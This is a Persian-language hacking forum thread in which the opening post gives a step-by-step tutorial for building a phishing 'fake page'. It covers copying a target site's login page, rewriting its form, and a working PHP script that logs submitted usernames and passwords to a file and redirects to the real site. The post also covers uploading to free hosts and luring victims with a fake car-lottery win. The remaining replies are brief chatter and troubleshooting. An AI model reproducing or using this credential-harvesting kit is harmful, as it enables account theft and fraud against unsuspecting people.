پرش به


تصویر
* - - - - 1 رای

ساخت فیک پیج


  • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
5 پاسخ برای این موضوع

#1 ارسالی 24 ژوئیه 2015 - 06:15

ZMAX
+25
    OFFLINE
    تاریخ عضویت :
    24 ژوئیه 2015
  • %20██▒▒▒▒▒▒▒▒
  • Anonymous
  • 21 ارسال
    Last Visit اوت 04 2015 12:27
  • Slogan : i HACKER
  • Gender : Male
  • Location : مشهد

اول سايتي رو که ميخوايد ازش فيک پيج بسازيد رو باز کنيد .



2- بعد از باز کردن سايت تا لود شدن کامل صبر کنيد . حالا راست کليک زده گزينه save page as رو بزنيد و صفحه را در حالت web page complete ذخيره کنيد .

3- حالا صفحه را با notepad باز کرده و Ctrl+F رو بزنيد تا گزينه find بياد . توش بنويسيد login و فايند رو بزنيد . احتمالا پشت login نوشته action . خوب ما همون login رو لازم داريم . ممکنه login با پسوند php ( که عاليه ) و يا aspx و يا هر چيز ديگري ذخيره شده باشه . من آموزشي که دادم براي php هستش . اگه پسوند چيز ديگه اي بود تو ادامه همين پست بگيد تا بگم چجوريه . خوب اگه login.php پشتش هرچي هست ، پاکش کنيد . مثلا اگه به صورت http://www.test.com/login.php، شما فقط login.php اينو بزاريد . بعد اگه method="post" هستش شما اونو به method="GET" تغيير بديد .

4- فعلا اينا رو بزاريد کنار يه notepad جديد باز کرده اين کد پايين رو توش بريزيد :
کد:

header ('Location: http://target.com');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

به جاي http://target.comاسم سايت مورد نظر رو بنويسيد . دقت کنيد اگه صفحه لاگين رو ميخوايد بسازيد بايد براي همون صفحه اين کار رو انجام بديد . مثلا اگر براي mail.yahoo.com ميخوايد فيک درست کنيد نريد اين کارا رو روي yahoo.com انجام بديدا !!!
خوب حالا فايل را به نام login.php ذخيره کنيد . فايل اول رو هم با پسوند html ذخيره کنيد .

5- بريد توي يه سايت فضاي رايگان مثل http://www.my3gb.comيا http://www.000webhost.com که php رو براي آپلود ساپورت کنه عضو شويد . و هر دو فايل رو آپلود کنيد . اگه بلد نيستيد روي سايت فايل آپلود کنيد اشکال نداره ، توي فيلمي که بعدا ميزارم آموزش اونم ميدم . اگه کسي بلد نبود فعلا ادامه همين تاپيک بپرسه تا بهش بگم

6- حالا کافيه آدرس اون فايل .html تون رو به طرف بديد و بگيد شما در قرعه کشي امسال برنده يک خودروي مزدا3 شده ايد . لطفا براي اطلاعات تکميلي به اين آدرس برويد !!!

7- طرف يوزر و پسوردش رو وارد کرده روي دکمه login.php کليک ميکنه . بعد پسوردش میاد داخل هاستی ک توش اون فایلو اپلود کردید



#2 ارسالی 24 ژوئیه 2015 - 08:37

    OFFLINE
    تاریخ عضویت :
    17 ژوئن 2015
  • ختم روزگار
  • Anonymous
  • 283 ارسال
    Last Visit نوامبر 22 2015 11:34
  • Slogan : hack & security
  • Country :
  • Gender : Male
  • Location : IRAN

اول جستوجو کنید بعد تابیک درست کنید

تو انجمن فیلمش هم هست


MaMaD_Malware


گروه امنیتی هکران ناشناس ایران


WWW.ANONYMOUS-SEC.ORG


اموزش html از 0 تا 100


#3 ارسالی 24 ژوئیه 2015 - 10:40

AmirWizard
+181
    OFFLINE
    تاریخ عضویت :
    12 ژوئیه 2015
  • %80████████▒▒
  • VIP
  • 88 ارسال
    Last Visit سپتامبر 22 2016 07:21
  • Gender : Male

سلام ببخشید با css رو یاد میدید؟؟؟



#4 ارسالی 12 سپتامبر 2015 - 06:55

    OFFLINE
    تاریخ عضویت :
    11 سپتامبر 2015
  • %10█▒▒▒▒▒▒▒▒▒
  • Anonymous
  • 14 ارسال
    Last Visit اكتبر 09 2015 01:19
  • Slogan : خواهش میکنم پارسی رو پاس بدارید
  • Gender : Male
  • Location : امپراطوری پارس
درود
دوستان من یه مشکلی دارم و مشکام اینه که وقتی رو هاست
دامنه ای با پسوند com. میسازم درست نمیشه
ولی وقتی با پسوند خوده سایت یعنی با استفاده از ساب دامین درست میکنم میاد بالا
میتونید کمکم کنید؟؟؟

#5 ارسالی 12 سپتامبر 2015 - 07:03

    OFFLINE
    تاریخ عضویت :
    11 سپتامبر 2015
  • %10█▒▒▒▒▒▒▒▒▒
  • Anonymous
  • 14 ارسال
    Last Visit اكتبر 09 2015 01:19
  • Slogan : خواهش میکنم پارسی رو پاس بدارید
  • Gender : Male
  • Location : امپراطوری پارس
ببخشید اشتباه شد.
روی سابدامنه نمیاد بالت اما روی دامنه میاد
یعنی وقتی آخره آدرسش آدرس سایته هاست باشه مثلا iranh.ir میاد ولی وقتی آخرش com. باشه نمیاد بالا.
لطفا کمکم کنید درستش کنم.

ویرایش شده توسط حشاش 12 سپتامبر 2015 - 07:04 .


#6 ارسالی 18 اوت 2016 - 11:51

    OFFLINE
    تاریخ عضویت :
    26 مه 2016
  • %10█▒▒▒▒▒▒▒▒▒
  • Anonymous
  • 18 ارسال
    Last Visit 2 روز قبل
  • Country :
  • Gender : Male
  • Location : iran
  • Name : pourya

قبل از لوگین اینو نوشته<div id="my_login_form_wrap">






0 کاربر در حال خواندن این موضوع است

0 کاربر، 0 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP